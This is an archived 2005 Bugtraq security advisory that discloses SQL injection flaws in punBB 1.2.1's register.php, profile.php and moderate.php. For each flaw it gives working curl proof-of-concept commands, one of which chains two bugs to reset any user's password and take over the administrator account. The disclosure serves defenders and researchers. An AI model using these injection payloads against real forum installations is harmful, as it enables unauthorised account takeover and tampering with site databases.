Multiple vulns in punBB

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Multiple vulns in punBB
From: John Gumbel <johannes.gumbel.2873@xxxxxxxxxxxxx>
Date: Thu, 24 Feb 2005 20:21:09 +0000
Cc: security@xxxxxxxxx
List-help: <mailto:bugtraq-help@securityfocus.com>
List-id: <bugtraq.list-id.securityfocus.com>
List-post: <mailto:bugtraq@securityfocus.com>
List-subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
List-unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
Mailing-list: contact bugtraq-help@xxxxxxxxxxxxxxxxx; run by ezmlm
User-agent: Mozilla Thunderbird 1.0 (X11/20041222)

...

 - Johannes Gumbel

=================================================
   SQL Injections in punbb-1.2.1 register.php
=================================================

 Description
 -----------

A remote attacker can cause register.php to execute
arbitrary SQL statements by supplying malicous
values to the language or email parameter.

The email paramter is guarded by the function
is_valid_email but this function doesn't do any
real filtering and will pass any SQL statement
that is formatted correctly.

This also affects systems using the magic_quotes_gpc
option in php.ini.

 Proof of concept
 ----------------

This example only demonstrates the vulnerability in
the language paramter.

curl --form form_sent=1 --form req_username=sha --form req_password1=passwd 
--form req_paspasswd --form req_email1=sha@xxxxxxxxx --form language="English', 
'Oxygen', 0, '0.0.0.0', 0) -- " http://target/register.php?action=registerer

Will create a user with the language English, style
Oxygen and ip 0.0.0.0.

=======================================================
  Multiple vulnerabilities in punbb-1.2.1 profile.php
=======================================================

 Description
 -----------

A remote attacker without an account can set the password
of any user on the system to NULL, effectivley shuting
them out of the system.

A user on the system can also inject an arbitrary
SQL statement using the change email feature. This has
occured because of a fault in the is_valid_email function
which returns true for strings that are not even close to
being a valid email.

This also affects systems using the magic_quotes_gpc
option in php.ini.

By combining these two an attacker with an account on
the forum can change the password for any user to anything
he/she wants to, gaining full access to the administrator
account.

 Proof of concept
 ----------------

Examples of the damage the DoS attack and arbitrary
SQL statement attacks can do on their own has been
omitted. This is a demonstration of their power when
combined.

Assumptions for this particular example:
 - There is a user on the system with id 3 that has
   username/password set to 'sha'/'passwd'.
 - The cookie is valid for sha on system
 - The system supports sha1.
 - The new password for the id 2 account is supposed to
   be 'newpass'.

curl --cookie punbb_cookie=<valid cookie> --form form_sent=1 --form 
req_new_email="6c55803d6f1d7a177a0db3eb4b343b0d50f9c111' -- sha@xxxxxxxxx" 
http://target/profile.php?action=change_email\&id=3

This will push the sha1 encrypted password 'newpass'
into every users activate_string field. All that needs
to be done is pushing this field to the password field
of any user we want using the other bug.

curl http://target/profile.php?action=change_pass\&id=2\&key=

Now the account with user id 2 has the password 'newpass' set.

==============================================
  SQL Injections in punbb-1.2.1 moderate.php
==============================================

 Description
 -----------

Improper handling of several arguments in
moderate.php allows a malicious moderator (or admin)
to inject arbitrary SQL statements.

This also affects systems using the magic_quotes_gpc
option in php.ini.

 Proof of concept
 ----------------

These examples will not do anything malicious or
even cause the system to report an error. Instead
they are crafted such that by simply adding a ;
or ' just before the comment "-- this won't show"
will cause the SQL query to crash demonstrating
the injection is possible.

Assumptions:
 - punbb_cookie contains identification of a
   moderator for forum with id 1.

Attacks delete posts:
curl --referer http://target/moderate.php --form posts="0) -- this won't show" 
--form delete_posts_comply=1 --cookie punbb_cookie=<valid cookie> 
target/moderate.php?fid=1\&tid=1

Attacks move topics:
curl --referer http://target/moderate.php --form topics="2) -- this won't show" 
--form move_to_forum=2 --form move_topics=1 --form move_topics_to=1 --cookie 
punbb_cookie=<valid cookie> target/moderate.php?fid=1

Attacks delete topics:
curl --referer http://target/moderate.php --form topics="2) -- this won't show" 
--form delete_topics=1 --form delete_topics_comply=1 --cookie 
punbb_cookie=<valid cookie> target/moderate.php?fid=1

Attacks open/close:
 curl --referer http://target/moderate.php --form "topics[0) -- this won't 
show]"= --form open=1 --cookie "punbb_cookie=<valid cookie> 
target/moderate.php?fid=1

Prev by Date: RE: Avaya IP Office Phone Manager - Sensitive Information Cleartext Vulnerability
Next by Date: MDKSA-2005:046 - Updated uim packages fix vulnerability
Previous by thread: In-game cl_guid crash in Soldier of Fortune II 1.03
Next by thread: MDKSA-2005:046 - Updated uim packages fix vulnerability
Index(es):
- Date
- Thread